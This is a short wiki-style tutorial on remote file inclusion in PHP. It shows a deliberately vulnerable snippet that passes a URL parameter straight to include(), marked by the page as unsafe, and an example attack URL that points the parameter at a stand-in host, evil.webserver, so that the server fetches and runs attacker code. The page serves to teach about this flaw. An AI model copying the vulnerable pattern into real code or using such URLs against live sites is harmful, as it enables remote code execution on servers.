Questions about this topic? Sign up to ask in the talk tab.

File Inclusion/Remote File Inclusion

From NetSec
Jump to: navigation, search

Remote file inclusion refers to inclusion of a file that is not located on the victim's server. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.

The example URI of a vulnerable site will be /include.php?file=howto.php

PHP for this may look like:

 
 <HTML>
 <TITLE>Page Title</TITLE>
 <BODY>
 
 
 <?php
 include($_GET['file']);
 ?>
 
 
 </BODY></HTML>
 
RPU0j.png The above PHP code is vulnerable. Do not use this on your site!

An attacker that sees

 /include.php?file=howto.php

may change the URL to

 /include.php?file=http://evil.webserver/include.txt


In this example, if include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side.